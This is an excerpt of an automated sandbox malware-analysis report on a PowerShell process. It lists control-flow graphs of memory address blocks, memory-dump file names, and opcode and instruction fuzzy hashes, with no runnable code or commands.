                                                        control_flow_graph 396 7ff848eb4494-7ff848eb44f2 400 7ff848eb46d0-7ff848eb46da 396->400 401 7ff848eb44f8-7ff848eb44fb 396->401 402 7ff848eb46e9-7ff848eb4729 400->402 403 7ff848eb46dc-7ff848eb46e8 400->403 404 7ff848eb4512 401->404 405 7ff848eb44fd-7ff848eb4510 401->405 415 7ff848eb472c-7ff848eb47eb 402->415 408 7ff848eb4514-7ff848eb4516 404->408 405->408 408->400 409 7ff848eb451c-7ff848eb4550 408->409 418 7ff848eb4552-7ff848eb4565 409->418 419 7ff848eb4567 409->419 420 7ff848eb4569-7ff848eb456b 418->420 419->420 420->400 423 7ff848eb4571-7ff848eb4579 420->423 423->415 424 7ff848eb457f-7ff848eb4589 423->424 426 7ff848eb45a5-7ff848eb45b5 424->426 427 7ff848eb458b-7ff848eb45a3 424->427 426->400 433 7ff848eb45bb-7ff848eb45ec 426->433 427->426 433->400 441 7ff848eb45f2-7ff848eb461e 433->441 445 7ff848eb4620-7ff848eb4647 441->445 446 7ff848eb4649 441->446 447 7ff848eb464b-7ff848eb464d 445->447 446->447 447->400 449 7ff848eb4653-7ff848eb465b 447->449 450 7ff848eb466b 449->450 451 7ff848eb465d-7ff848eb4667 449->451 454 7ff848eb4670-7ff848eb4685 450->454 452 7ff848eb4687-7ff848eb46a9 451->452 453 7ff848eb4669 451->453 458 7ff848eb46b0-7ff848eb46b6 452->458 453->454 454->452 459 7ff848eb46bd-7ff848eb46cf 458->459
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3599172462.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848eb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 3e23b9dff6a59d27156f0ceb1b31976cf2b40f746d731ca2e98553231b4120da
                                                        • Instruction ID: 771d51e095e294e57dd2e96d981ce17a77411b5a9ae135dde9369e87b8c2fd12
                                                        • Opcode Fuzzy Hash: 3e23b9dff6a59d27156f0ceb1b31976cf2b40f746d731ca2e98553231b4120da
                                                        • Instruction Fuzzy Hash: 9661DF32E1EA868FE7A5EB2854552787AE1FF25798F4800FAC14DC71D3DE39AC458309

                                                        Control-flow Graph

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3599172462.00007FF848EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848EB0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848eb0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ea80a7ee095785da000e49c37e6e1dd9d3e6f867d6f0ac4e15f30a087b82cf52
                                                        • Instruction ID: ee53b4ea5b85438f9025c7d18c53f5de18b0aa4c695ea6eb2249d693386d219c
                                                        • Opcode Fuzzy Hash: ea80a7ee095785da000e49c37e6e1dd9d3e6f867d6f0ac4e15f30a087b82cf52
                                                        • Instruction Fuzzy Hash: E821F631E1EE8A4FF3A5F628545527466D2FF512A1F4800BED44DC319AEE2EEC05824A

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 631 7ff848de5f78-7ff848de5fc4 637 7ff848de5fc5-7ff848de5fdc 631->637 639 7ff848de5fde-7ff848de6031 637->639 645 7ff848de6035-7ff848de604c 639->645 648 7ff848de604e-7ff848de60c1 645->648 656 7ff848de60c4-7ff848de60dc 648->656 659 7ff848de60de-7ff848de6131 656->659 665 7ff848de6134-7ff848de614c 659->665 668 7ff848de614e-7ff848de6229 665->668 683 7ff848de622b-7ff848de6244 668->683 686 7ff848de6246-7ff848de6329 683->686 702 7ff848de632a-7ff848de6344 686->702 705 7ff848de6346-7ff848de6362 702->705 707 7ff848de6364-7ff848de636a 705->707 708 7ff848de63b3-7ff848de63b6 705->708 709 7ff848de636c-7ff848de6372 707->709 710 7ff848de63bb-7ff848de63bf 707->710 708->710 711 7ff848de6374-7ff848de63b1 709->711 712 7ff848de63c3-7ff848de63c9 709->712 710->712 711->708 713 7ff848de63cc-7ff848de63d1 712->713 714 7ff848de641b-7ff848de641e 712->714 713->708 716 7ff848de6423-7ff848de6441 714->716 721 7ff848de6443-7ff848de64af 716->721 731 7ff848de64b2 721->731 732 7ff848de64b4-7ff848de64d1 731->732 733 7ff848de6503-7ff848de652e 731->733 732->731 737 7ff848de6530-7ff848de6536 733->737 738 7ff848de654d-7ff848de654e 733->738 744 7ff848de6554-7ff848de6556 737->744 745 7ff848de6538-7ff848de653e 737->745 739 7ff848de6550-7ff848de6556 738->739 740 7ff848de6569-7ff848de656e 738->740 741 7ff848de6570-7ff848de6576 739->741 747 7ff848de6558-7ff848de655e 739->747 740->741 748 7ff848de6577-7ff848de657d 741->748 744->741 744->747 750 7ff848de6540-7ff848de6546 745->750 751 7ff848de655b-7ff848de655e 745->751 747->748 754 7ff848de6560-7ff848de6566 747->754 755 7ff848de657e-7ff848de65af 748->755 758 7ff848de6562-7ff848de6566 750->758 759 7ff848de6548 750->759 751->748 751->754 754->755 760 7ff848de6568-7ff848de657d 754->760 769 7ff848de65b1-7ff848de65d1 755->769 758->755 758->760 759->738 760->755 769->769
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.3598305363.00007FF848DE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848DE0000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff848de0000_powershell.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: O_I$O_I
                                                        • API String ID: 0-150625707
                                                        • Opcode ID: 8ea5294ec2f5bc1747f0eeec255f4a4de0eb9d892687b3d11afcc21540544e74
                                                        • Instruction ID: 70eeb444003a850f5c9872798974e4721f46f574697ea0a62ef456f5ca2eaac3
                                                        • Opcode Fuzzy Hash: 8ea5294ec2f5bc1747f0eeec255f4a4de0eb9d892687b3d11afcc21540544e74
                                                        • Instruction Fuzzy Hash: 18220747F0EC825FF256666C78063F86B90FFD56A5F0842BBD14C8B08F69185D4E82E9